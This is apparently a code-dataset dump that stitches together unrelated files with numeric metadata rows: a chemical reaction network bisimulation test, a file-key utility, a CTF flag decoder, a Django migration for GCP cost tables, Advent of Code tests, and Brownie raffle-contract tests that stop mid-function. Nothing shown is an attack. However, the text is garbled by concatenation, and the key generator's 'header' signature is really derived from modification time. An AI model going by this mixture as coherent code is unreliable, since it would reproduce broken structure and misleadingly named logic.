'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C', 'C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
i11 = {'A': ['A'], 'B': ['B'], 'C': ['C'], 'e100': ['A', 'A'], 'e101': ['B'], 'e102': [], 'e103': [], 'e104': [], 'e105': [], 'e106': ['A'], 'e107': ['A'], 'e108': ['A', 'B'], 'e109': [], 'e110': [],
'e111': ['B', 'B'], 'e112': ['B'], 'e113': [], 'e114': [], 'e115': ['C', 'C'], 'e116': ['A'], 'e117': ['A', 'C'], 'e118': [], 'e119': [], 'e120': [], 'e121': [], 'e122': ['C']}
@unittest.skipIf(True, "loopsearch permissive checker hangs or is far too slow; see TODO notes in the tests below.")
class LoopsearchBisimulationTests(unittest.TestCase):
def test_QingDong_crn6_i02_ls(self):
# NOTE: takes 22 hours... probably a bug!
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
inter_02 = {'i842': ['Y', 'X', 'A'],
'i394': ['X', 'Y', 'X'],
'i119': ['X', 'B', 'A'],
'i2300': ['A', 'C'],
'i778': ['Y'],
'i575': ['X'],
'i599': ['C'],
'i2232': ['A'],
'i73': ['B']}
v, _ = crn_bisimulation_test(fcrn, icrn, fs, interpretation = inter_02, permissive = 'loopsearch')
self.assertTrue(v)
def test_QingDong_crn6_i1_ls(self):
# TODO: does not finish ... probably a bug!
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
inter_01 = {'i778': ['Y'],
'i575': ['X'],
'i599': ['C'],
'i2232': ['A'],
'i73': ['B']}
v, _ = crn_bisimulation_test(fcrn, icrn, fs,
interpretation = inter_01,
permissive = 'loopsearch')
self.assertTrue(v)
def test_QingDong_crn6_ls(self):
# TODO: test again after i1 and i2 terminate.
fcrn, fs = parse_crn('tests/crns/crn6.crn', is_file = True)
icrn, _ = parse_crn('tests/crns/icrns/crn6_qingdong_thesis.crn', is_file = True)
v, _ = crn_bisimulation_test(fcrn, icrn, fs, permissive = 'loopsearch')
self.assertTrue(v)
if __name__ == '__main__':
unittest.main()
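Every test above passes an interpretation dict that maps implementation species to lists (multisets) of formal species. A minimal, self-contained sketch of how such a map is applied to a species-count state (toy code under that assumption, not the tested library's API):

```python
from collections import Counter

def interpret(state, inter):
    """Map an implementation state {species: count} through an
    interpretation {species: [formal species, ...]}."""
    out = Counter()
    for sp, n in state.items():
        for formal in inter.get(sp, []):
            out[formal] += n
    return out

# e.g. part of the mapping used in the first test above:
inter = {'A': ['A'], 'C': ['C'], 'x1': ['A'], 'x3': ['A', 'C']}
assert interpret({'C': 1, 'x1': 1}, inter) == Counter({'A': 1, 'C': 1})
```

Species interpreted as the empty list (waste species) simply vanish from the formal state, which is why many entries above map to `[]`.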
| 44.103147 | 208 | 0.414569 | 8,810 | 75,681 | 3.456073 | 0.055846 | 0.017998 | 0.008572 | 0.026668 | 0.815226 | 0.782941 | 0.75647 | 0.71673 | 0.694266 | 0.646282 | 0 | 0.061702 | 0.345569 | 75,681 | 1,715 | 209 | 44.128863 | 0.553061 | 0.046696 | 0 | 0.556246 | 0 | 0 | 0.158171 | 0.009789 | 0 | 0 | 0 | 0.000583 | 0.21256 | 1 | 0.043478 | false | 0.055901 | 0.002761 | 0 | 0.05314 | 0.020014 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
3d47ee59d2b01dc2c0ca4844f4c1b82592af1e25 | 1,484 | py | Python | haesh/util.py | VincentHokie/haesh | 5d6eb19d6836a8f94181a33f27c3ffce98c43548 | [
"MIT"
] | null | null | null | haesh/util.py | VincentHokie/haesh | 5d6eb19d6836a8f94181a33f27c3ffce98c43548 | [
"MIT"
] | null | null | null | haesh/util.py | VincentHokie/haesh | 5d6eb19d6836a8f94181a33f27c3ffce98c43548 | [
"MIT"
] | null | null | null | import os
import random
RANGE_MIN = 1
RANGE_MAX = 1000
class HaeshKeyGenerator(object):
def __init__(self, file_path, text):
self._file_path = file_path
self._text = text
def get_text_signature_key(self):
# NOTE: currently identical to get_file_signature_key(); self._text is
# not yet mixed into the key.
file_size = self._get_file_size_int_signature()
mod_time = self._get_file_modification_time_int_signature()
file_header = self._get_file_header_int_signature()
key = f'{file_size}{mod_time}{file_header}'
return key.encode(encoding = 'UTF-8')
def get_file_signature_key(self):
file_size = self._get_file_size_int_signature()
mod_time = self._get_file_modification_time_int_signature()
file_header = self._get_file_header_int_signature()
key = f'{file_size}{mod_time}{file_header}'
return key.encode(encoding = 'UTF-8')
def _get_file_size_int_signature(self):
size = os.path.getsize(self._file_path)
random.seed(size)
random_int = random.randint(RANGE_MIN, RANGE_MAX)
return f'{random_int:04}'
def _get_file_modification_time_int_signature(self):
time = os.path.getmtime(self._file_path)
random.seed(time)
random_int = random.randint(RANGE_MIN, RANGE_MAX)
return f'{random_int:04}'
def _get_file_header_int_signature(self):
# NOTE: despite its name, this value is derived from the file's
# modification time, not from the file's header bytes.
time = os.path.getmtime(self._file_path)
random.seed(time)
random_int = random.randint(RANGE_MIN, RANGE_MAX)
return f'{random_int:08}'
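The three `_get_*_int_signature` helpers all use the same trick: seed the RNG with a file attribute so the "random" integer is deterministic per file. A standalone sketch of that pattern (hypothetical helper name; it uses a local `random.Random` so it does not disturb global RNG state the way the class-level `random.seed` calls do):

```python
import random

def deterministic_token(seed_value, low=1, high=1000):
    # Same seed in -> same token out, without mutating the global RNG.
    rng = random.Random(seed_value)
    return f'{rng.randint(low, high):04}'

assert deterministic_token(1484) == deterministic_token(1484)
```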
| 32.977778 | 67 | 0.68531 | 207 | 1,484 | 4.458937 | 0.188406 | 0.07584 | 0.071506 | 0.045504 | 0.824485 | 0.776815 | 0.75948 | 0.75948 | 0.75948 | 0.75948 | 0 | 0.012079 | 0.219003 | 1,484 | 44 | 68 | 33.727273 | 0.784297 | 0 | 0 | 0.542857 | 0 | 0 | 0.076819 | 0.045822 | 0 | 0 | 0 | 0 | 0 | 1 | 0.171429 | false | 0 | 0.057143 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e9fcd2f820cb41fd8c2698188d2a3c8973c76cba | 8,017 | py | Python | CTFR-Penyelesaian/018 Warna warni 2/warna warni 2/decode.py | dimasma0305/PicoCTF-Penyelesaian | 69c315b269412c766d91bc909b75c8bbfebdc12c | [
"MIT"
] | 1 | 2022-01-01T14:37:49.000Z | 2022-01-01T14:37:49.000Z | CTFR-Penyelesaian/018 Warna warni 2/warna warni 2/decode.py | dimasma0305/PicoCTF-Penyelesaian | 69c315b269412c766d91bc909b75c8bbfebdc12c | [
"MIT"
] | null | null | null | CTFR-Penyelesaian/018 Warna warni 2/warna warni 2/decode.py | dimasma0305/PicoCTF-Penyelesaian | 69c315b269412c766d91bc909b75c8bbfebdc12c | [
"MIT"
] | 1 | 2021-12-30T07:48:32.000Z | 2021-12-30T07:48:32.000Z | flag = [3752536516130773641885711225353928704, 5117095249269236784389606216391720960, 5312032211146160090461591215111405568, 5117095249269236784389606216391720960, 5360766451615390916979587464791326720, 1559495695015386448575879989757476864, 5604437653961545049569568713190932480, 4922158287392313478317621217672036352, 5360766451615390916979587464791326720, 5019626768330775131353613717031878656, 4727221325515390172245636218952351744, 5165829489738467610907602466071642112, 4727221325515390172245636218952351744, 1559495695015386448575879989757476864, 5312032211146160090461591215111405568, 4922158287392313478317621217672036352, 5360766451615390916979587464791326720, 4727221325515390172245636218952351744, 5312032211146160090461591215111405568, 4775955565984620998763632468632272896, 4727221325515390172245636218952351744, 5068361008800005957871609966711799808, 5214563730207698437425598715751563264, 4727221325515390172245636218952351744, 5360766451615390916979587464791326720, 1559495695015386448575879989757476864, 4775955565984620998763632468632272896, 4922158287392313478317621217672036352, 4775955565984620998763632468632272896, 4922158287392313478317621217672036352, 5555703413492314223051572463511011328, 4727221325515390172245636218952351744, 5458234932553852570015579964151169024, 4727221325515390172245636218952351744, 1559495695015386448575879989757476864, 5214563730207698437425598715751563264, 4727221325515390172245636218952351744, 5263297970676929263943594965431484416, 5117095249269236784389606216391720960, 5312032211146160090461591215111405568, 4727221325515390172245636218952351744, 5653171894430775876087564962870853632, 1559495695015386448575879989757476864, 4873424046923082651799624967992115200, 5117095249269236784389606216391720960, 5604437653961545049569568713190932480, 5117095249269236784389606216391720960, 5360766451615390916979587464791326720, 5117095249269236784389606216391720960, 
1559495695015386448575879989757476864, 4727221325515390172245636218952351744, 5019626768330775131353613717031878656, 4727221325515390172245636218952351744, 5555703413492314223051572463511011328, 1559495695015386448575879989757476864, 5312032211146160090461591215111405568, 4922158287392313478317621217672036352, 5360766451615390916979587464791326720, 4824689806453851825281628718312194048, 4922158287392313478317621217672036352, 5019626768330775131353613717031878656, 4727221325515390172245636218952351744, 5068361008800005957871609966711799808, 1559495695015386448575879989757476864, 3216459870969234550187752478874796032, 5555703413492314223051572463511011328, 5701906134900006702605561212550774784, 5653171894430775876087564962870853632, 4922158287392313478317621217672036352, 4970892527861544304835617467351957504, 5409500692084621743497583714471247872, 5555703413492314223051572463511011328, 4824689806453851825281628718312194048, 4922158287392313478317621217672036352, 1559495695015386448575879989757476864, 2826585947215387938043782481435426816, 3313928351907696203223744978234638336, 2241775061584618019827827485276372992, 1559495695015386448575879989757476864, 3216459870969234550187752478874796032, 5653171894430775876087564962870853632, 5799374615838468355641553711910617088, 1559495695015386448575879989757476864, 5068361008800005957871609966711799808, 4922158287392313478317621217672036352, 5555703413492314223051572463511011328, 4922158287392313478317621217672036352, 1559495695015386448575879989757476864, 5117095249269236784389606216391720960, 5604437653961545049569568713190932480, 1559495695015386448575879989757476864, 5896843096776930008677546211270459392, 5409500692084621743497583714471247872, 5701906134900006702605561212550774784, 5555703413492314223051572463511011328, 1559495695015386448575879989757476864, 4970892527861544304835617467351957504, 5263297970676929263943594965431484416, 4727221325515390172245636218952351744, 5019626768330775131353613717031878656, 
1559495695015386448575879989757476864, 2826585947215387938043782481435426816, 1559495695015386448575879989757476864, 3265194111438465376705748728554717184, 4093676199415389427511684973113376768, 3411396832846157856259737477594480640, 3996207718476927774475692473753534464, 5994311577715391661713538710630301696, 2534180504400002978935804983355899904, 2582914744869233805453801233035821056, 2582914744869233805453801233035821056, 2485446263930772152417808733675978752, 5312032211146160090461591215111405568, 4775955565984620998763632468632272896, 5263297970676929263943594965431484416, 5896843096776930008677546211270459392, 4629752844576928519209643719592509440, 2387977782992310499381816234316136448, 5360766451615390916979587464791326720, 2582914744869233805453801233035821056, 5653171894430775876087564962870853632, 5555703413492314223051572463511011328, 5701906134900006702605561212550774784, 4824689806453851825281628718312194048, 5653171894430775876087564962870853632, 2387977782992310499381816234316136448, 2339243542523079672863819984636215296, 5360766451615390916979587464791326720, 4629752844576928519209643719592509440, 2387977782992310499381816234316136448, 5360766451615390916979587464791326720, 2582914744869233805453801233035821056, 2387977782992310499381816234316136448, 4873424046923082651799624967992115200, 2485446263930772152417808733675978752, 4629752844576928519209643719592509440, 2387977782992310499381816234316136448, 5312032211146160090461591215111405568, 2534180504400002978935804983355899904, 5019626768330775131353613717031878656, 2485446263930772152417808733675978752, 4629752844576928519209643719592509440, 2387977782992310499381816234316136448, 4970892527861544304835617467351957504, 4629752844576928519209643719592509440, 5896843096776930008677546211270459392, 2339243542523079672863819984636215296, 5701906134900006702605561212550774784, 4629752844576928519209643719592509440, 5555703413492314223051572463511011328, 2485446263930772152417808733675978752, 
2534180504400002978935804983355899904, 4873424046923082651799624967992115200, 4629752844576928519209643719592509440, 5117095249269236784389606216391720960, 5653171894430775876087564962870853632, 6091780058653853314749531209990144000, 2241775061584618019827827485276372992, 1559495695015386448575879989757476864, 3752536516130773641885711225353928704, 4727221325515390172245636218952351744, 4727221325515390172245636218952351744, 4970892527861544304835617467351957504, 1559495695015386448575879989757476864, 5360766451615390916979587464791326720, 5117095249269236784389606216391720960, 5068361008800005957871609966711799808, 5068361008800005957871609966711799808, 1559495695015386448575879989757476864, 4824689806453851825281628718312194048, 5068361008800005957871609966711799808, 4727221325515390172245636218952351744, 5263297970676929263943594965431484416, 5263297970676929263943594965431484416, 4922158287392313478317621217672036352, 5360766451615390916979587464791326720, 5019626768330775131353613717031878656, 4922158287392313478317621217672036352, 1559495695015386448575879989757476864, 5360766451615390916979587464791326720, 5896843096776930008677546211270459392, 4727221325515390172245636218952351744, 1559495695015386448575879989757476864, 4873424046923082651799624967992115200, 5117095249269236784389606216391720960, 1559495695015386448575879989757476864, 5555703413492314223051572463511011328, 4922158287392313478317621217672036352, 5312032211146160090461591215111405568, 4727221325515390172245636218952351744, 5214563730207698437425598715751563264, 4922158287392313478317621217672036352, 1559495695015386448575879989757476864, 5653171894430775876087564962870853632, 5555703413492314223051572463511011328, 5409500692084621743497583714471247872, 5604437653961545049569568713190932480, 5604437653961545049569568713190932480, 1559495695015386448575879989757476864, 2826585947215387938043782481435426816, 1949369618769233060719849987196846080]
bagi = 48734240469230826517996249679921152
res = []
for i in range(len(flag)):
# Integer floor division (//) avoids float rounding on these huge
# integers, which could shift a character code off by one.
res.append(flag[i] // bagi)
for i in range(len(res)):
print(chr(res[i]), end='') | 1,002.125 | 7,846 | 0.942248 | 228 | 8,017 | 33.131579 | 0.241228 | 0.039185 | 0.029388 | 0.039185 | 0.003707 | 0 | 0 | 0 | 0 | 0 | 0 | 0.959302 | 0.02844 | 8,017 | 8 | 7,847 | 1,002.125 | 0.010528 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
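The script above appears to encode each character as its code point multiplied by the shared factor `bagi`, so floor division recovers the text. A tiny self-contained demo of the same scheme, using the same constant but its own toy message:

```python
demo_factor = 48734240469230826517996249679921152  # same constant as bagi above
demo_flag = [ord(c) * demo_factor for c in "picoCTF"]
decoded = ''.join(chr(v // demo_factor) for v in demo_flag)
assert decoded == "picoCTF"
```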
18084de3d9a6c6eb8ab988ae0f6b5f439d237d81 | 5,361 | py | Python | koku/reporting/migrations/0160_auto_20210114_1548.py | cgoodfred/koku | f1de8bc90d6a818c4f77af710cafe50dc1274700 | [
"Apache-2.0"
] | 2 | 2022-01-12T03:42:39.000Z | 2022-01-12T03:42:40.000Z | koku/reporting/migrations/0160_auto_20210114_1548.py | cgoodfred/koku | f1de8bc90d6a818c4f77af710cafe50dc1274700 | [
"Apache-2.0"
] | null | null | null | koku/reporting/migrations/0160_auto_20210114_1548.py | cgoodfred/koku | f1de8bc90d6a818c4f77af710cafe50dc1274700 | [
"Apache-2.0"
] | 1 | 2021-07-21T09:33:59.000Z | 2021-07-21T09:33:59.000Z | # Generated by Django 3.1.3 on 2021-01-14 15:48
import django.contrib.postgres.fields
from django.db import migrations
from django.db import models
class Migration(migrations.Migration):
dependencies = [("reporting", "0159_gcp_cost_summary")]
operations = [
migrations.CreateModel(
name="GCPCostSummary",
fields=[
("id", models.IntegerField(primary_key=True, serialize=False)),
("usage_start", models.DateField()),
("usage_end", models.DateField()),
("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("currency", models.CharField(max_length=10)),
("source_uuid", models.UUIDField(null=True)),
],
options={"db_table": "reporting_gcp_cost_summary", "managed": False},
),
migrations.CreateModel(
name="GCPCostSummaryByAccount",
fields=[
("id", models.IntegerField(primary_key=True, serialize=False)),
("usage_start", models.DateField()),
("usage_end", models.DateField()),
("account_id", models.CharField(max_length=50)),
("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("currency", models.CharField(max_length=10)),
("source_uuid", models.UUIDField(null=True)),
],
options={"db_table": "reporting_gcp_cost_summary_by_account", "managed": False},
),
migrations.CreateModel(
name="GCPCostSummaryByProject",
fields=[
("id", models.IntegerField(primary_key=True, serialize=False)),
("usage_start", models.DateField()),
("usage_end", models.DateField()),
("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("currency", models.CharField(max_length=10)),
("source_uuid", models.UUIDField(null=True)),
("project_id", models.CharField(max_length=256, unique=True)),
("project_name", models.CharField(max_length=256)),
("account_id", models.CharField(max_length=50)),
],
options={"db_table": "reporting_gcp_cost_summary_by_project", "managed": False},
),
migrations.CreateModel(
name="GCPCostSummaryByRegion",
fields=[
("id", models.IntegerField(primary_key=True, serialize=False)),
("usage_start", models.DateField()),
("usage_end", models.DateField()),
("account_id", models.CharField(max_length=50)),
("region", models.CharField(max_length=50, null=True)),
("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("currency", models.CharField(max_length=10)),
("source_uuid", models.UUIDField(null=True)),
],
options={"db_table": "reporting_gcp_cost_summary_by_region", "managed": False},
),
migrations.CreateModel(
name="GCPCostSummaryByService",
fields=[
("id", models.IntegerField(primary_key=True, serialize=False)),
("usage_start", models.DateField()),
("usage_end", models.DateField()),
("account_id", models.CharField(max_length=50)),
("unblended_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("markup_cost", models.DecimalField(decimal_places=9, max_digits=24, null=True)),
("currency", models.CharField(max_length=10)),
("source_uuid", models.UUIDField(null=True)),
("service_id", models.CharField(max_length=256, null=True)),
("service_alias", models.CharField(blank=True, max_length=256, null=True)),
],
options={"db_table": "reporting_gcp_cost_summary_by_service", "managed": False},
),
migrations.AddField(model_name="gcptagssummary", name="project_id", field=models.TextField(null=True)),
migrations.AddField(model_name="gcptagssummary", name="project_name", field=models.TextField(null=True)),
migrations.AddField(
model_name="gcptagsvalues",
name="project_ids",
field=django.contrib.postgres.fields.ArrayField(base_field=models.TextField(), null=True, size=None),
),
migrations.AddField(
model_name="gcptagsvalues",
name="project_names",
field=django.contrib.postgres.fields.ArrayField(base_field=models.TextField(), null=True, size=None),
),
migrations.AlterUniqueTogether(
name="gcptagssummary", unique_together={("key", "cost_entry_bill", "account_id", "project_id")}
),
]
| 52.558824 | 113 | 0.59653 | 532 | 5,361 | 5.789474 | 0.171053 | 0.057143 | 0.075974 | 0.101299 | 0.82013 | 0.748377 | 0.729545 | 0.672078 | 0.659416 | 0.623701 | 0 | 0.02048 | 0.262265 | 5,361 | 101 | 114 | 53.079208 | 0.758281 | 0.008394 | 0 | 0.708333 | 1 | 0 | 0.179902 | 0.053632 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.03125 | 0 | 0.0625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
# py/tests/test_day02.py (andrewblim/advent-of-code-2020, MIT)
from .context import advent_of_code_2020
from advent_of_code_2020.day02 import *
def test_validate_policy_and_password():
assert validate_policy_and_password("1-3 a: abcde")
assert not validate_policy_and_password("1-3 b: cdefg")
assert validate_policy_and_password("2-9 c: ccccccccc")
def test_validate_policy_and_password2():
assert validate_policy_and_password2("1-3 a: abcde")
assert not validate_policy_and_password2("1-3 b: cdefg")
assert not validate_policy_and_password2("2-9 c: ccccccccc")
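The functions under test are imported from `advent_of_code_2020.day02`, which is not part of this excerpt. A minimal reference implementation consistent with the six assertions above might look like this (the function names match the imports; the parsing regex is an assumption):

```python
import re

POLICY = re.compile(r"(\d+)-(\d+) (\w): (\w+)")

def validate_policy_and_password(line):
    # Part 1: the character must occur between lo and hi times (inclusive).
    lo, hi, char, password = POLICY.match(line).groups()
    return int(lo) <= password.count(char) <= int(hi)

def validate_policy_and_password2(line):
    # Part 2: exactly one of the two 1-indexed positions holds the character.
    a, b, char, password = POLICY.match(line).groups()
    return (password[int(a) - 1] == char) != (password[int(b) - 1] == char)
```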
# brownie/tests/test_charity_deploy.py (SuperZooper3/CharityRaffle, MIT)
from scripts.helpers import get_account, smart_get_account, get_contract, fund_link, LOCAL_BLOCKCHAIN_ENVIRONMENTS
from brownie import network, accounts, config, CharityRaffle
import time
import pytest
from random import randint
ticketPrice = 0.001*10**18
exp_time, length = 0, 0
def init_values():
global exp_time, length
if network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS:
length = 10
exp_time = 5
else:
length = 240
exp_time = 120
def deploy_raffle_contract():
account = smart_get_account(0)
print("account:", account)
raffle = CharityRaffle.deploy(
exp_time,
get_contract("vrf_coordinator").address,
get_contract("link_token").address,
config["networks"][network.show_active()]["fee"],
config["networks"][network.show_active()]["keyhash"],
{'from': account},
publish_source=config["networks"][network.show_active()].get("verify", False)
)
print("Charity raffle@", raffle)
return raffle
def fake_VRF_response(raffle, requestId, value):
print("Fake VRF response")
callTx = get_contract("vrf_coordinator").callBackWithRandomness(requestId, value, raffle.address, {'from': smart_get_account(0)})
callTx.wait(1)
print("Fake VRF response done", callTx.events)
time.sleep(1)
# All of the tests here:
# - Deploy a raffle contract
# - Create a raffle
# - Buy tickets
# - Buy a ticket without paying enough
# - Keep track of the change correctly
# - Collect the change
# - Check that only the owner can collect the change
# - Test getting a refund
# - Test getting a refund when the raffle is not over
# - Test that a refund can't be gotten while the raffle is getting finished
# - Test that only the beneficiary can claim the raffle
# - Test that the raffle can't be claimed before the end time
# - Test that the raffle can't be claimed after the expiry time
# - Test picking different winners
# - Test storing the ticket buyers
def test_deploy_raffle_contract():
init_values()
raffle = deploy_raffle_contract()
def test_create_raffle():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
# Act
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Assert
Dname, Dbeneficiary, Dwinner, DstartTime, DendTime = raffle.GetRaffleInfo(1)
assert raffle.RaffleCount() == 1
assert Dname == name
assert Dbeneficiary == smart_get_account(0)
assert Dwinner == "0x0000000000000000000000000000000000000000"
assert DstartTime < DendTime
assert DstartTime + length == DendTime
assert DstartTime <= int(time.time()) # It doesn't start in the future
def test_ticket_buying():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
print(createTx.return_value)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 2, {'from': smart_get_account(2), 'value': ticketPrice*2})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 5, {'from': smart_get_account(3), 'value': ticketPrice*5})
enterTx.wait(1)
# Assert
assert raffle.GetRaffleBalance(1, smart_get_account(1)) == 1
assert raffle.GetRaffleBalance(1, smart_get_account(2)) == 2
assert raffle.GetRaffleBalance(1, smart_get_account(3)) == 5
def test_buy_ticket_without_paying_enough():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
with pytest.raises(Exception):
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice-100})
enterTx.wait(1)
def test_ticket_change_tracked():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice+100})
enterTx.wait(1)
# Assert
assert raffle.change() == 100
def test_collect_change():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice+100})
enterTx.wait(1)
# Assert
assert raffle.change() == 100
collectTx = raffle.CollectChange({'from': smart_get_account(0)})
collectTx.wait(1)
assert raffle.change() == 0
def test_only_owner_can_collect_change():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice+100})
enterTx.wait(1)
# Assert
with pytest.raises(Exception):
refundTx = raffle.CollectChange({'from': smart_get_account(1)})
refundTx.wait(1)
def test_ticket_refund():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice+100})
enterTx.wait(1)
# Assert
print(length+exp_time)
time.sleep(length+exp_time)
beforeRefundEthBalance = smart_get_account(1).balance()
refundTx = raffle.TicketRefund(1, {'from': smart_get_account(1)})
refundTx.wait(1)
assert raffle.GetRaffleBalance(1, smart_get_account(1)) == 0
assert smart_get_account(1).balance() > beforeRefundEthBalance # We get some ETH back (doesn't deal with gas prices)
def test_cannot_refund_before_end():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice+100})
enterTx.wait(1)
# Assert
with pytest.raises(Exception):
refundTx = raffle.TicketRefund(1, {'from': smart_get_account(1)})
refundTx.wait(1)
def test_cannot_refund_while_selecting_winner():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice+100})
enterTx.wait(1)
# Now we trigger the end of the raffle
print(length, network.show_active())
time.sleep(length)
fund_link(raffle.address, account=smart_get_account(0))
claimTx = raffle.ClaimRaffle(1, {'from': smart_get_account(0)})
claimTx.wait(1)
time.sleep(exp_time)
# Assert
with pytest.raises(Exception):
refundTx = raffle.TicketRefund(1, {'from': smart_get_account(1)})
refundTx.wait(1)
def test_only_ben_can_claim():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
# Now we trigger the end of the raffle
time.sleep(length)
# Assert
with pytest.raises(Exception):
claimTx = raffle.ClaimRaffle(1, {'from': smart_get_account(1)})
claimTx.wait(1)
def test_cannot_claim_before_end():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
# Assert
with pytest.raises(Exception):
claimTx = raffle.ClaimRaffle(1, {'from': smart_get_account(0)})
claimTx.wait(1)
def test_cannot_claim_after_expired():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
createTx.wait(1)
# Act
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
# Now we trigger the end of the raffle and miss the expiry time
time.sleep(length+exp_time+1)
# Assert
with pytest.raises(Exception):
claimTx = raffle.ClaimRaffle(1, {'from': smart_get_account(0)})
claimTx.wait(1)
def test_correctly_pick_winner_zero():
init_values()
# Arrange
raffle = deploy_raffle_contract()
name = "Test Raffle"
createTx = raffle.CreateRaffle(name, ticketPrice, length, {'from': smart_get_account(0)})
# Act
createTx.wait(1)
enterTx = raffle.BuyTickets(1, 1, {'from': smart_get_account(1), 'value': ticketPrice})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 2, {'from': smart_get_account(2), 'value': ticketPrice*2})
enterTx.wait(1)
enterTx = raffle.BuyTickets(1, 5, {'from': smart_get_account(3), 'value': ticketPrice*5})
enterTx.wait(1)
# Now we trigger the end of the raffle
print(length)
time.sleep(length)
fund_link(raffle.address, account=smart_get_account(0))
